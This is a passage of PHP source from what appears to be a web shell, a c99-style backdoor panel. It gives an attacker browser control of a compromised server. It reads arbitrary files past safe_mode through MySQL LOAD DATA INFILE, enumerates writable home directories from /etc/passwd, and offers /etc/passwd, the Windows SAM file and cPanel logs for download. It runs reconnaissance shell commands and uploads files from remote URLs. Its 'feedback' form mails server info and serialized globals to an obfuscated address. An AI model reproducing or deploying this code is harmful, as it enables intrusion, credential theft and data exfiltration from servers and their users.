  1477.        echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1478.       }
  1479.      }
  1480.      if ($sql_tbl_act == "browse")
  1481.      {
  1482.       $sql_tbl_ls = abs($sql_tbl_ls);
  1483.       $sql_tbl_le = abs($sql_tbl_le);
  1484.       echo "<hr size=\"1\" noshade>";
  1485.       echo "Pages ";
  1486.       $b = 0;
  1487.       for($i=0;$i<$numpages;$i++)
  1488.       {
  1489.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1490.     echo $i;
  1491.     if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1492.     if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";
  1493.     } else {
  1494.     echo "&nbsp;";}
  1495.     }
  1496.     if ($i == 0) {echo "empty";
  1497.     }
  1498.     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\">
  1499.     <input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\">
  1500.     <input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\">
  1501.     <input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\">
  1502.     <input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\">
  1503.     <input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\">
  1504.     <input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\">
  1505.     <input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\">From: <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> To: <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
  1506.     echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#990000 cellPadding=5 width=\"1%\" bgcolor=transparent borderColorLight=#c0c0c0 border=1>";
  1507.     echo "<tr>";
  1508.     echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1509.     for ($i=0;$i<mysql_num_fields($result);$i++)
  1510.     {
  1511.     $v = mysql_field_name($result,$i);
  1512.     if ($e[0] == "a") {$s = "d"; $m = "asc";} else {
  1513.     $s = "a"; $m = "desc";}
  1514.     echo "<td>";
  1515.     if (empty($e[0])) {$e[0] = "a";}
  1516.     if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\">".$v."</a>";
  1517.     } else {
  1518.     echo "".$v."<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."xtux=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1519.     echo "</td>";
  1520.     }
  1521.     echo "<td><font color=\"red\">Action</font></td>";
  1522.     echo "</tr>";
  1523.     while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1524.     {
  1525.     echo "<tr>";
  1526.     $w = "";
  1527.     $i = 0;
  1528.     foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1529.     if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1530.     echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1531.     $i = 0;
  1532.     foreach ($row as $k=>$v)
  1533.     {
  1534.         $v = htmlspecialchars($v);
  1535.         if ($v == "") {$v = "<font color=\"red\">NULL</font>";}
  1536.         echo "<td>".$v."</td>";
  1537.         $i++;
  1538.        }
  1539.        echo "<td>";
  1540.        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a> &#124;";
  1541.        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"> Edit</a>";
  1542.        echo "</td>";
  1543.        echo "</tr>";
  1544.       }
  1545.       mysql_free_result($result);
  1546.       echo "</table><hr size=\"1\" noshade><p align=\"left\">&#94;<select name=\"sql_act\">";
  1547.       echo "<option value=\"\">With selected:</option>";
  1548.       echo "<option value=\"deleterow\">Delete</option>";
  1549.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1550.      }
  1551.     } else {
  1552.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1553.      if (!$result) {echo mysql_smarterror();
  1554.     } else {
  1555. echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#990000 cellPadding=5 width=\"100%\" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center>Table</center></td><td>Rows</td><td>Type</td><td>Created</td><td>Modified</td><td>Size</td><td>Action</td></tr>";
  1556.       $i = 0;
  1557.       $tsize = $trows = 0;
  1558.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1559.       {
  1560.        $tsize += $row["Data_length"];
  1561.        $trows += $row["Rows"];
  1562.        $size = view_size($row["Data_length"]);
  1563.        echo "<tr>";
  1564.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1565.        echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\">".$row["Name"]."</a> </td>";
  1566.        echo "<td>".$row["Rows"]."</td>";
  1567.        echo "<td>".$row["Type"]."</td>";
  1568.        echo "<td>".$row["Create_time"]."</td>";
  1569.        echo "<td>".$row["Update_time"]."</td>";
  1570.        echo "<td>".$size."</td>";
  1571.        echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">Empty</a>&#124;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">Drop</a>&#124;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\">Insert</a> </td>";
  1572.        echo "</tr>";
  1573.        $i++;
  1574.       }
  1575.       echo "<tr bgcolor=\"transparent\">";
  1576.       echo "<td><center>+</center></td>";
  1577.       echo "<td><center>".$i." table(s)</center></td>";
  1578.       echo "<td>".$trows."</td>";
  1579.       echo "<td>".$row[1]."</td>";
  1580.       echo "<td>".$row[10]."</td>";
  1581.       echo "<td>".$row[11]."</td>";
  1582.       echo "<td>".view_size($tsize)."</td>";
  1583.       echo "<td></td>";
  1584.       echo "</tr>";
  1585.       echo "</table><hr size=\"1\" noshade><p align=\"right\">&#94;<select name=\"sql_act\">";
  1586.       echo "<option value=\"\">With selected:</option>";
  1587.       echo "<option value=\"tbldrop\">Drop</option>";
  1588.       echo "<option value=\"tblempty\">Empty</option>";
  1589.       echo "<option value=\"tbldump\">Dump</option>";
  1590.       echo "<option value=\"tblcheck\">Check table</option>";
  1591.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  1592.       echo "<option value=\"tblrepair\">Repair table</option>";
  1593.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  1594.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1595.       mysql_free_result($result);
  1596.      }
  1597.     }
  1598.    }
  1599.    }
  1600.     } else {
  1601.    $xtuxs = array("","newdb","serverstatus","servervars","processes","getfile");
  1602.    if (in_array($sql_act,$xtuxs)) {
  1603.     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1">Create new DB:
  1604.     <form action="<?php echo $surl; ?>">
  1605.     <input type="hidden" name="act" value="sql">
  1606.     <input type="hidden" name="sql_act" value="newdb">
  1607.     <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1608.     <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1609.     <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  1610.     <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  1611.     <input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td>
  1612.     <td width="30%" height="1">View File:<form action="<?php echo $surl; ?>">
  1613.     <input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile">
  1614.     <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1615.     <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1616.     <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  1617.     <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  1618.     <input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">
  1619.     <input type="submit" value="Get"></form></td>
  1620.     <td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr>
  1621.     </table><?php
  1622.     }
  1623.     if (!empty($sql_act))
  1624.     {
  1625.     echo "<hr size=\"1\" noshade>";
  1626.     if ($sql_act == "newdb")
  1627.     {
  1628.     echo "";
  1629.     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!<br>";
  1630.     } else {
  1631.     echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason: ".mysql_smarterror();}
  1632.     }
  1633.     if ($sql_act == "serverstatus")
  1634.     {
  1635.     $result = mysql_query("SHOW STATUS", $sql_sock);
  1636.     echo "<center>Server-status variables:<br><br>";
  1637.     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=transparent borderColorLight=#333333 border=1><td>Name</td><td>Value</td></tr>";
  1638.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1639.      echo "</table></center>";
  1640.      mysql_free_result($result);
  1641.     }
  1642.     if ($sql_act == "servervars")
  1643.     {
  1644.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1645.      echo "<center>Server variables:<br><br>";
  1646.      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=transparent borderColorLight=#333333 border=1><td>Name</td><td>Value</td></tr>";
  1647.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1648.      echo "</table>";
  1649.      mysql_free_result($result);
  1650.     }
  1651.     if ($sql_act == "processes")
  1652.     {
  1653.      if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
  1654.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1655.      echo "<center>Processes:<br><br>";
  1656.      echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=transparent borderColorLight=#333333 border=1><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td><td>Action</td></tr>";
  1657.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1658.      echo "</table>";
  1659.      mysql_free_result($result);
  1660.     }
  1661.     if ($sql_act == "getfile")
  1662.     {
  1663.      $tmpdb = $sql_login."_tmpdb";
  1664.      $select = mysql_select_db($tmpdb);
  1665.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1666.      if ($select)
  1667.      {
  1668.       $created = FALSE;
  1669.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1670.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1671.       $result = mysql_query("SELECT * FROM tmp_file;");
  1672.       if (!$result) {echo "Error in reading file (permision denied)!";
  1673.     } else {
  1674.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1675.        $f = "";
  1676.        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1677.        if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!<br>";
  1678.     } else {
  1679.     echo "File \"".$sql_getfile."\":<br>".nl2br(htmlspecialchars($f))."<br>";}
  1680.        mysql_free_result($result);
  1681.        mysql_query("DROP TABLE tmp_file;");
  1682.       }
  1683.      }
  1684.      mysql_drop_db($tmpdb); //comment it if you want to leave database
  1685.     }
  1686.    }
  1687.   }
  1688.  }
  1689.  echo "</td></tr></table>";
  1690.  if ($sql_sock)
  1691.  {
  1692.   $affected = @mysql_affected_rows($sql_sock);
  1693.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1694.   echo "<tr><td><center>Infected rows: ".$affected."</center></td></tr>";
  1695.  }
  1696.  echo "</table>";
  1697. }
  1698. if ($xtux == "mkdir")
  1699. {
  1700.  if ($mkdir != $d)
  1701.  {
  1702.   if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";}
  1703.   elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}
  1704.   echo "<br><br>";
  1705.  }
  1706.  $xtux = $dspact = "ls";
  1707. }
  1708. if ($xtux == "d")
  1709. {
  1710.  if (!is_dir($d)) {echo "<center>Permision denied!</center>";
  1711.     } else {
  1712.   echo "Directory information:<table border=0 cellspacing=1 cellpadding=2>";
  1713.   if (!$win)
  1714.   {
  1715.    echo "<tr><td>Owner/Group</td><td> ";
  1716.    $ow = posix_getpwuid(fileowner($d));
  1717.    $gr = posix_getgrgid(filegroup($d));
  1718.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1719.   }
  1720.   echo "<tr><td>Perms</td><td><a href=\"".$surl."xtux=chmod&d=".urlencode($d)."\">".view_perms_color($d)."</a><tr><td>Create time</td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td>Access time</td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td>MODIFY time</td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1721.  }
  1722. }
  1723. if ($xtux == "finder") {
  1724. $count=0;
  1725. set_time_limit(0);
  1726. @$passwd=fopen('/etc/passwd','r');
  1727. if (!$passwd) {
  1728.    echo "[-] No Access to /etc/passwd\n\r";
  1729.    exit;
  1730. }
  1731. $path_to_public=array();
  1732. echo "<html>\n\r";
  1733. while(!feof($passwd)) {
  1734.   $str=fgets($passwd);
  1735.     $pos=strpos($str,":");
  1736.     $username=substr($str,0,$pos);
  1737.     $dirz="/home/$username/public_html/";
  1738.     if (($username!="")) {
  1739.         if (is_readable($dirz)) {
  1740.          array_push($path_to_public,$dirz);
  1741.          if (is_writeable($dirz)) {
  1742.             $count++;
  1743.             echo "<font color=red>[</font><font color=white>R</font><font color=green>W</font><font color=red>]</font> " . $dirz . "<br>\n\r";
  1744.          } else
  1745.     echo "<font color=red>[</font><font color=white>R</font><font color=red>]</font> " . $dirz . "<br>\n\r";
  1746.         }
  1747.     }
  1748. }
  1749. echo "[+] Found " . sizeof($path_to_public) . " readable public_html directories.<br><br>\n\r\n\r";
  1750. function read_dir($path) {
  1751.    global $count;
  1752.    if ($handle = opendir($path)) {
  1753.       while (false !== ($file = readdir($handle))) {
  1754.          $dr="$path$file/";
  1755.          if (($file!='.') and ($file!='..') and is_dir($dr)) {
  1756.             if (is_readable($dr) and is_writeable($dr)) {
  1757.                echo "[RW] " . $dr . "<br>\n\r";
  1758.                $count++;
  1759.             }
  1760.             read_dir($dr);
  1761.          }
  1762.       }
  1763.    }
  1764. }
  1765. }
  1766. if ($xtux == "phpinfo") {@ob_clean(); phpinfo(); TuXexit();}
  1767. if ($xtux == "security")
  1768. {
  1769. echo "<center>Server security information:</center>Open base dir: ".$hopenbasedir."<br>";
  1770. if (!$win)
  1771. {
  1772. if ($nixpasswd)
  1773. {
  1774. if ($nixpasswd == 1) {$nixpasswd = 0;}
  1775. echo "*nix /etc/passwd:<br>";
  1776. if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1777. if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1778. echo "<form action=\"".$surl."\"><input type=hidden name=\"xtux\" value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\">From:&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;To:&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1779.    $i = $nixpwd_s;
  1780.    while ($i < $nixpwd_e)
  1781.    {
  1782.     $uid = posix_getpwuid($i);
  1783.     if ($uid)
  1784.     {
  1785.      $uid["dir"] = "<a href=\"".$surl."xtux=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1786.      echo join(":",$uid)."<br>";
  1787.     }
  1788.     $i++;
  1789.    }
  1790. } else {
  1791. echo "<br><a href=\"".$surl."xtux=security&nixpasswd=1&d=".$ud."\"><u>Get /etc/passwd</u></a><br>";}
  1792. } else {
  1793. $v = $_SERVER["WINDIR"]."\repair\sam";
  1794. if (file_get_contents($v)) { echo "<font color=red>You can't crack winnt passwords(".$v.") </font><br>";
  1795. } else {
  1796. echo "<font color=green>You can crack winnt passwords. <a href=\"".$surl."xtux=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u>Download</u></a>, and use lcp.crack+ ?.</font><br>";}
  1797. }
  1798.  if (file_get_contents("/etc/userdomains")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u>View cpanel user-domains logs</u></a></font><br>";}
  1799.  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u>View cpanel logs</u></a></font><br>";}
  1800.  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u>Apache configuration (httpd.conf)</u></a></font><br>";}
  1801.  if (file_get_contents("/etc/httpd.conf")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u>Apache configuration (httpd.conf)</u></a></font><br>";}
  1802.  if (file_get_contents("/etc/syslog.conf")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u>Syslog configuration (syslog.conf)</u></a></font><br>";}
  1803.  if (file_get_contents("/etc/motd")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u>Message Of The Day</u></a></font><br>";}
  1804.  if (file_get_contents("/etc/hosts")) {echo "<font color=green><a href=\"".$surl."xtux=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u>Hosts</u></a></font><br>";}
  1805.  function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."<br>";}}
  1806.  displaysecinfo("OS Version?",o2xdaexec("cat /proc/version"));
  1807.  displaysecinfo("Kernel version?",o2xdaexec("sysctl -a | grep version"));
  1808.  displaysecinfo("Distrib name",o2xdaexec("cat /etc/issue.net"));
  1809.  displaysecinfo("Distrib name (2)",o2xdaexec("cat /etc/*-realise"));
  1810.  displaysecinfo("CPU?",o2xdaexec("cat /proc/cpuinfo"));
  1811.  displaysecinfo("RAM",o2xdaexec("free -m"));
  1812.  displaysecinfo("HDD space",o2xdaexec("df -h"));
  1813.  displaysecinfo("List of Attributes",o2xdaexec("lsattr -a"));
  1814.  displaysecinfo("Mount options ",o2xdaexec("cat /etc/fstab"));
  1815.  displaysecinfo("Is cURL installed?",o2xdaexec("which curl"));
  1816.  displaysecinfo("Is lynx installed?",o2xdaexec("which lynx"));
  1817.  displaysecinfo("Is links installed?",o2xdaexec("which links"));
  1818.  displaysecinfo("Is fetch installed?",o2xdaexec("which fetch"));
  1819.  displaysecinfo("Is GET installed?",o2xdaexec("which GET"));
  1820.  displaysecinfo("Is perl installed?",o2xdaexec("which perl"));
  1821.  displaysecinfo("Where is apache",o2xdaexec("whereis apache"));
  1822.  displaysecinfo("Where is perl?",o2xdaexec("whereis perl"));
  1823.  displaysecinfo("locate proftpd.conf",o2xdaexec("locate proftpd.conf"));
  1824.  displaysecinfo("locate httpd.conf",o2xdaexec("locate httpd.conf"));
  1825.  displaysecinfo("locate my.conf",o2xdaexec("locate my.conf"));
  1826.  displaysecinfo("locate psybnc.conf",o2xdaexec("locate psybnc.conf"));
  1827. }
  1828. if ($xtux == "mkfile")
  1829. {
  1830. if ($mkfile != $d)
  1831. {
  1832. if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
  1833. elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";
  1834. } else {
  1835. $xtux = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1836. } else {
  1837. $xtux = $dspact = "ls";}
  1838. }
  1839. if ($xtux == "encoder")
  1840. {
  1841.  echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center>Encoding Tools</center>
  1842. <form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=xtux value=encoder>Input: <center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=2>".@htmlspecialchars($encoder_input)."</textarea></center><br><br><center><input type=submit value=\"calculate\"></center><br><br>Hashes:<br><center>";
  1843.  foreach(array("md5","crypt","sha1","crc32") as $v)
  1844. {
  1845. echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
  1846. }
  1847. echo "</center>Url:<center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
  1848. <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
  1849. <br></center>Base64:<center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
  1850. echo "<center>base64_decode - ";
  1851. if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";
  1852. } else {
  1853.     $debase64 = base64_decode($encoder_input);
  1854.     $debase64 = str_replace("\0","[0]",$debase64);
  1855.     $a = explode("\r\n",$debase64);
  1856.     $rows = count($a);
  1857.     $debase64 = htmlspecialchars($debase64);
  1858. if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";
  1859. } else {
  1860. $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
  1861.   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">^</a>";
  1862.  }
  1863.  echo "</center><br>Base convertations:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
  1864.  $c = strlen($encoder_input);
  1865.  for($i=0;$i<$c;$i++)
  1866.  {
  1867.   $hex = dechex(ord($encoder_input[$i]));
  1868.   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  1869.   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
  1870.  }
  1871.  echo "\" readonly><br></center></form>";
  1872. }
  1873. if ($xtux == "fsbuff")
  1874. {
  1875.  $arr_copy = $sess_data["copy"];
  1876.  $arr_cut = $sess_data["cut"];
  1877.  $arr = array_merge($arr_copy,$arr_cut);
  1878.  if (count($arr) == 0) {echo "<center>Buffer is empty!</center>";
  1879. } else {
  1880. echo "File-System buffer<br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $xtux = "ls";}
  1881. }
  1882. if ($xtux == "selfremove")
  1883. {
  1884. if (($submit == $rndcode) and ($submit != ""))
  1885. {
  1886. if (unlink(__FILE__)) {@ob_clean(); echo "See u!"; TuXexit();
  1887. } else {
  1888. echo "<center>Can't delete ".__FILE__."!</center>";}
  1889. } else {
  1890. if (!empty($rndcode)) {echo "Error: incorrect confimation!";}
  1891. $rnd = rand(0,9).rand(0,9).rand(0,9);
  1892. echo "<form action=\"".$surl."\"><input type=hidden name=xtux value=selfremove>Destroy: ".__FILE__." <br>Are you sure?<br>For confirmation, enter \"".$rnd."\":&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  1893.  }
  1894. }
  1895. if ($xtux == "update") {$ret = TuX_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."xtux=update&confirmupdate=1';\" value=\"Update now\">";}}
  1896. if ($xtux == "feedback")
  1897. {
  1898. $suppmail = base64_decode("Y2VlbWRlQHlhaG9vLmNvbQ==");
  1899. if (!empty($submit))
  1900. {
  1901. $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  1902. $body = "feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  1903. if (!empty($fdbk_ref))
  1904. {
  1905. $tmp = @ob_get_contents();
  1906. ob_clean();
  1907. phpinfo();
  1908. $phpinfo = base64_encode(ob_get_contents());
  1909. ob_clean();
  1910. echo $tmp;
  1911. $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  1912. }
  1913. mail($suppmail,"feedback #".$ticket,$body,"FROM: ".$suppmail);
  1914. echo "<center><b>Your ticket ID: ".$ticket.".</b></center>";
  1915. } else {
  1916. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=xtux value=feedback>Contact Us (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Indonesian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  1917. }
  1918. if ($xtux == "upload") {
  1919. $uploadmess = "";
  1920. $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  1921. if (empty($uploadpath)) {$uploadpath = $d;
  1922. }
  1923. elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";
  1924. }
  1925. if (!empty($submit)) {
  1926. global $HTTP_POST_FILES;
  1927. $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1928. if (!empty($uploadfile["tmp_name"])) {
  1929. if (empty($uploadfilename)) {$destin = $uploadfile["name"];
  1930. } else {
  1931. $destin = $userfilename;}
  1932. if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
  1933.     $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>"; }
  1934. }
  1935. elseif (!empty($uploadurl))
  1936. {
  1937. if (!empty($uploadfilename)) {$destin = $uploadfilename;
  1938. } else {
  1939. $destin = explode("/",$destin);
  1940. $destin = $destin[count($destin)-1];
  1941. if (empty($destin))
  1942. {
  1943.      $i = 0;
  1944.      $b = "";
